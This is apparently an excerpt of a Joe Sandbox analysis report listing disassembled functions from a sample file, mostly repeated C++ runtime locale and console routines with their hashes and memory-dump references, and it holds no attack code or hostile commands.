                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D7B4
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D7D4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: f7be7e9ce43be85aee98cb1e00a321b03f87d4917b2a4ee85cfa8d9ca17abf58
                                                      • Instruction ID: 7598f685d73657cf2aadcbca45be1b91e4c3fe76bad5bd2d27069724dba24f44
                                                      • Opcode Fuzzy Hash: f7be7e9ce43be85aee98cb1e00a321b03f87d4917b2a4ee85cfa8d9ca17abf58
                                                      • Instruction Fuzzy Hash: B301DE3A9001199FCF04FBA4DA42AAE77B1BFC0724F240809F8116B291DF749E05CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A528D3
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A528DD
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5292E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5294E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 640da8968a2aa261a6b3c86f9ae0d82c660b97e57dfa84e6718b30a47a129038
                                                      • Instruction ID: 1144f1b53c3e954f2e191796f8cc863480b24caab88c104302b14eac411619a6
                                                      • Opcode Fuzzy Hash: 640da8968a2aa261a6b3c86f9ae0d82c660b97e57dfa84e6718b30a47a129038
                                                      • Instruction Fuzzy Hash: 5101C036A00225DBCB14FBA49A51ABE77B1BFC5721F240809F81067392CF749E0A87D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5283E
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52848
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52899
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A528B9
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 3177c0dd4531913212ecae0cd20db83aefa790594676ec9b61470566a670a364
                                                      • Instruction ID: 7f3047f3d81e519c1b7ce13078a86cbe43e2e4bd48d44c52d2f40e046b728272
                                                      • Opcode Fuzzy Hash: 3177c0dd4531913212ecae0cd20db83aefa790594676ec9b61470566a670a364
                                                      • Instruction Fuzzy Hash: 2001C036900125DFCB14FBA4DA41BBE77B1BF80721F240909F8106B292DF749E098B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5E974
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5E97E
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5E9CF
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5E9EF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 9a7a1bc45dd734c21b7e527ff9107c2f9f309c49d2fcc635c65d628f39dbb666
                                                      • Instruction ID: f5edf0c39feebb6235c3654adc526c81f2e635ca1748df5337f7a54005b259da
                                                      • Opcode Fuzzy Hash: 9a7a1bc45dd734c21b7e527ff9107c2f9f309c49d2fcc635c65d628f39dbb666
                                                      • Instruction Fuzzy Hash: 7F01D236900125DBCB19FBA4DA42ABEB7B5BF80711F240809FD106B292CF749E09C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EA09
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EA13
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EA64
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EA84
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: b2f987e70d2010e9c7322f8f01e421f1d4df801c9f02f3c69d018b8f3fef53bf
                                                      • Instruction ID: f681766fa9258161694f49a5fea985059e9d10a9f84af546d79aa0fda5aec186
                                                      • Opcode Fuzzy Hash: b2f987e70d2010e9c7322f8f01e421f1d4df801c9f02f3c69d018b8f3fef53bf
                                                      • Instruction Fuzzy Hash: E001D2369002159FCF18FBB4DA41AAE77B1BF94722F250809F9016B291DF749E498791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52BBC
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52BC6
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52C17
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52C37
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 4a0d0c76f22ae2607f3463737d86ca2314e9d8651d79e8fa4bf30811b93f424d
                                                      • Instruction ID: aa08597a95ce1dda69515de48d1f15d2a55e2e3583cdfad573d5f494bb590429
                                                      • Opcode Fuzzy Hash: 4a0d0c76f22ae2607f3463737d86ca2314e9d8651d79e8fa4bf30811b93f424d
                                                      • Instruction Fuzzy Hash: 5601D236901119DBCF14FBA4EA41AAE77B1BF90711F244849FC006B292DF749E09CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EBC8
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EBD2
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EC23
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EC43
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: b54ef48631019316c36136dfbfdb8b11a5b3c1ad491d87af6ac6d7e96fcdb0fb
                                                      • Instruction ID: 92272bfef465eef7ff7d4d002f4f523f800e7d0d7eec2de528f017fe2218c5a7
                                                      • Opcode Fuzzy Hash: b54ef48631019316c36136dfbfdb8b11a5b3c1ad491d87af6ac6d7e96fcdb0fb
                                                      • Instruction Fuzzy Hash: C301D236A00115DFCB18FBA4DA46ABE77B1BF90722F240849F814AB2D1DF74DE098791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52CE6
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52CF0
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52D41
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52D61
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 589e4d0ff8af636d1b95a58ef43b9e057153c211566eb070b3def56edbc8f094
                                                      • Instruction ID: 6e2e16f2b360274ae905964adaaa69003fa98a4f3fbedb6f64aae372eb568757
                                                      • Opcode Fuzzy Hash: 589e4d0ff8af636d1b95a58ef43b9e057153c211566eb070b3def56edbc8f094
                                                      • Instruction Fuzzy Hash: A501C036A001199BCF15FBA4DA41AAE77B1BF94721F240509F81067292DF749E0A8791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52C51
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52C5B
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52CAC
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52CCC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 796a3920f3afd1a514198a185c503e48df2d1ad770f7d31b6306c91df6ee989f
                                                      • Instruction ID: a775aeb581073f15065c06fefd6c5fab66e9348f29f61cd4805a3b53fb51fbd9
                                                      • Opcode Fuzzy Hash: 796a3920f3afd1a514198a185c503e48df2d1ad770f7d31b6306c91df6ee989f
                                                      • Instruction Fuzzy Hash: 7501C036901119DBCB14FBA49A41ABEB7B1BFC4711F240409F8116B392CF749E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EC5D
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EC67
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5ECB8
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5ECD8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 9042d5ef512ca642405ae3da7efbeaf3e81c7c2819babecd90b7150ea0a885b0
                                                      • Instruction ID: a7e251540418bb99dce941811f7e159d2b119c15c9752baf641a75b2c1a7a3dd
                                                      • Opcode Fuzzy Hash: 9042d5ef512ca642405ae3da7efbeaf3e81c7c2819babecd90b7150ea0a885b0
                                                      • Instruction Fuzzy Hash: D001DE36E00119DFCB09FBA4DA45AAE77B1BF80721F240409F801AB291DF74DE4ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52EA5
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52EAF
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52F00
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52F20
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 7305a54e4c530440c2d8db557fbcafa78cee28f31b2c9824f8ffa5f7b8a39c2b
                                                      • Instruction ID: cd93a2c9956bf71a786bf12b1deb4ecad97064805e28ab88bb676c93c63b4eae
                                                      • Opcode Fuzzy Hash: 7305a54e4c530440c2d8db557fbcafa78cee28f31b2c9824f8ffa5f7b8a39c2b
                                                      • Instruction Fuzzy Hash: AE01D2369001299BCB05FBA4EA41ABE77B1BF85711F240809FC1067291CF749E09CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52E10
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52E1A
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52E6B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52E8B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: b441db1f8785a3b8194dddc8c50b33feb2aa3a803941383fb549e4ea00c4d37b
                                                      • Instruction ID: 85a28385c5f7f0cf5048d052bc44d5e4ee44e472c7cec4c77f54ba673c83cda5
                                                      • Opcode Fuzzy Hash: b441db1f8785a3b8194dddc8c50b33feb2aa3a803941383fb549e4ea00c4d37b
                                                      • Instruction Fuzzy Hash: 7801F136900119DFCB14FBA4DA42ABEBBB1BF95721F240909FD106B291DF749E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52F3A
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52F44
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52F95
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52FB5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 9ae36a4418c8f873bab36db761000f396ed088f568b31e68304b8f71d259d09b
                                                      • Instruction ID: e2efe1e7748cfa6a422ff5786954e15a69102be20b9ebbda88886bdf66cea3bd
                                                      • Opcode Fuzzy Hash: 9ae36a4418c8f873bab36db761000f396ed088f568b31e68304b8f71d259d09b
                                                      • Instruction Fuzzy Hash: 5201D236900115DFCB14FBA4EA41BBEB7B1BF94721F240409F8006B292DF749E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000), ref: 00A8369D
                                                      • GetLastError.KERNEL32(?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000,?,?,?,00A8271F,?), ref: 00A836A9
                                                        • Part of subcall function 00A8366F: CloseHandle.KERNEL32(FFFFFFFE,00A836B9,?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000,?,?), ref: 00A8367F
                                                      • ___initconout.LIBCMT ref: 00A836B9
                                                        • Part of subcall function 00A83631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A83660,00A83040,?,?,00A82198,?,?,00000000,?), ref: 00A83644
                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000,?), ref: 00A836CE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 8dcb2e67d334682400efa55566d42a953a8ffac72a3eb282cbd4d79a01b42d31
                                                      • Instruction ID: a6e007cb0bc1751cedcd8d4a6baad21eec106527293c9329685d9e0c19386fc5
                                                      • Opcode Fuzzy Hash: 8dcb2e67d334682400efa55566d42a953a8ffac72a3eb282cbd4d79a01b42d31
                                                      • Instruction Fuzzy Hash: 6CF03037504158BBCF62AFD9DC0899E3F66FB087B1B504160FE199A630DA32C921EB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SleepConditionVariableCS.KERNELBASE(?,00A62CBD,00000064), ref: 00A62D43
                                                      • LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A62CBD,00000064,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62D4D
                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00A62CBD,00000064,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62D5E
                                                      • EnterCriticalSection.KERNEL32(00A9DD3C,?,00A62CBD,00000064,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62D65
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID:
                                                      • API String ID: 3269011525-0
                                                      • Opcode ID: 6572ad30fb9461b8ce05ed111051e8aa93e52ad03c9bacafeeec5cd3cf78e9d9
                                                      • Instruction ID: 8818c916cc93985c7f6a4334ec2239f8facb2b9fd904d6df39f6e7bdef063ee3
                                                      • Opcode Fuzzy Hash: 6572ad30fb9461b8ce05ed111051e8aa93e52ad03c9bacafeeec5cd3cf78e9d9
                                                      • Instruction Fuzzy Hash: AEE0DF32706524FBCF126BC0EC08A8EBF39FF08B20F100411F9096A171CF608A828BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A4EC8E
                                                        • Part of subcall function 00A4D87C: __EH_prolog3.LIBCMT ref: 00A4D883
                                                        • Part of subcall function 00A4D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00A4D88D
                                                        • Part of subcall function 00A4D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D8FE
                                                      • _Find_elem.LIBCPMT ref: 00A4EE8A
                                                      Strings
                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00A4ECF6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
